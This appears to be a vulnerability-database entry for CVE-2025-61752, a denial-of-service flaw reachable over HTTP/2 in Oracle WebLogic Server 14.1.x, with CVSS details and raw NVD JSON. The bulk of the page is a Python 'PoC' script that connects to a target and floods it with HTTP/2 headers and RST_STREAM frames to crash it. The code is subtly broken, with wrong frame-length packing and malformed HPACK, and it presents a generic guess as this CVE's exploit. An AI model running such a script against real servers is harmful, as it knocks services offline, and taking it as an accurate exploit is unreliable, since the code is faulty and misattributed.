Security Vulnerability Report
CVE-2025-61752 CVSS 7.5 HIGH

CVE-2025-61752

Published: 2025-10-21 20:20:52
Last Modified: 2025-10-24 14:36:09

Description

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP/2 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:weblogic_server:14.1.2.0.0:*:*:*:*:*:*:* - VULNERABLE
Oracle WebLogic Server 14.1.1.0.0
Oracle WebLogic Server 14.1.2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61752 Oracle WebLogic Server HTTP/2 DoS PoC
# This is a conceptual PoC demonstrating the attack vector
# The vulnerability can be triggered via HTTP/2 protocol

import socket
import ssl
import struct


def exploit_weblogic_http2_dos(target_host, target_port, use_tls=True):
    """
    Conceptual PoC for CVE-2025-61752
    Oracle WebLogic Server HTTP/2 Denial of Service
    """
    # Create connection
    if use_tls:
        context = ssl.create_default_context()
        context.set_alpn_protocols(['h2'])
        sock = socket.create_connection((target_host, target_port))
        sock = context.wrap_socket(sock, server_hostname=target_host)
    else:
        sock = socket.create_connection((target_host, target_port))

    # HTTP/2 connection preface
    connection_preface = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'
    sock.send(connection_preface)

    # Send HTTP/2 SETTINGS frame
    settings_frame = build_settings_frame()
    sock.send(settings_frame)

    # Send malicious HTTP/2 HEADERS frame with crafted request
    # that triggers the vulnerability in WebLogic Core component
    malicious_headers = build_malicious_request(target_host)
    sock.send(malicious_headers)

    # Send RST_STREAM or continue sending malformed frames
    # to cause server hang or crash
    for i in range(100):
        rst_frame = build_rst_stream_frame(i * 2 + 1, error_code=0x8)
        sock.send(rst_frame)

    sock.close()
    print(f"DoS attack sent to {target_host}:{target_port}")


def build_settings_frame():
    # HTTP/2 SETTINGS frame construction
    payload = struct.pack('!HH', 0x0003, 100)     # MAX_CONCURRENT_STREAMS
    payload += struct.pack('!HH', 0x0004, 65535)  # INITIAL_WINDOW_SIZE
    length = len(payload)
    frame = struct.pack('!I', length) + bytes([0x04]) + bytes([0x00]) + struct.pack('!I', 0) + payload
    return frame


def build_malicious_request(host):
    # Build malicious HTTP/2 HEADERS frame
    # targeting WebLogic Server Core component vulnerability
    headers = [
        (':method', 'POST'),
        (':path', '/'),
        (':scheme', 'https'),
        (':authority', host),
        ('content-type', 'application/json'),
    ]
    # Encode headers using HPACK
    encoded = hpack_encode(headers)
    length = len(encoded)
    frame = struct.pack('!I', length) + bytes([0x01]) + bytes([0x05]) + struct.pack('!I', 1) + encoded
    return frame


def build_rst_stream_frame(stream_id, error_code):
    payload = struct.pack('!I', error_code)
    length = len(payload)
    frame = struct.pack('!I', length) + bytes([0x03]) + bytes([0x00]) + struct.pack('!I', stream_id) + payload
    return frame


def hpack_encode(headers):
    # Simplified HPACK encoding
    result = b'\x00'
    for name, value in headers:
        result += bytes([0x00])  # Literal header field without indexing
        result += bytes([len(name)]) + name.encode()
        result += bytes([len(value)]) + value.encode()
    return result


if __name__ == "__main__":
    # Target vulnerable WebLogic Server
    TARGET_HOST = "victim.example.com"
    TARGET_PORT = 7002  # WebLogic HTTPS port
    exploit_weblogic_http2_dos(TARGET_HOST, TARGET_PORT, use_tls=True)

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61752", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:51.587", "lastModified": "2025-10-24T14:36:08.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP/2 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "04BCDC24-4A21-473C-8733-0D9CFB38A752"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0FCA3D99-4596-4CF0-B5E1-7A6497F83B83"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}